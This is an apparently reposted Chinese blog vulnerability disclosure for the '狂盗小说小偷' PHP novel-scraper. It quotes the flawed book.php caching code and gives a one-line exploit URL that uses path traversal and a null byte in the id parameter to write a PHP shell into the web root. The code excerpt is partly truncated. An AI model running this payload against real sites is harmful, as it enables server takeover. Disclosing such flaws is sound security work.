狂盗小说小偷 GET Shell 漏洞

  • A+
所属分类:lcx

By:Cond0r

很傻比的一漏洞

必须开启缓存才能利用

先看代码

book.php:

$kd_cachedir = "./cache"; 
if($kd_book_cache=="ture"){//缓存必须开启
   $lastflesh = @filemtime($kd_cachedir."/book$shuid.html");
  // echo $lastflesh;
     if(!file_exists("./cache/book$shuid.html") or ($lastflesh + ($kd_book_hctime * 60 * 60)
           ob_start();     
              include "./templates/$kd_moban/book.html";
              $mianfei = ob_get_contents();
              ob_end_clean();
                  file_put_contents("./cache/book$shuid.html",$mianfei); 
                 echo file_get_contents($kd_cachedir."/book$shuid.html");
          }else{
                     echo file_get_contents("./cache/book$shuid.html");

                  }
      }else{
            include "./templates/$kd_moban/book.html";
          }
?>

exp:http://1.com/book.php?id=/../../1.php%00“>

根目录:1.php

本地测试:

狂盗小说小偷 GET Shell 漏洞

文章来源于lcx.cc:狂盗小说小偷 GET Shell 漏洞

相关推荐: 【公告】博客系统再次更新 添加了邮件提醒功能

邮件提醒功能 新的后台登陆界面 本次更新重要功能有: 1.后台的一点细节问题,更方便使用。 2.添加网站留言提醒功能,支持选择是否使用此功能。 3.修改后台登陆界面(自己设计的)。 首先修改了一点小细节的问题,不值一提(其实仅仅是一个超链接,改成了新建窗口打开…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: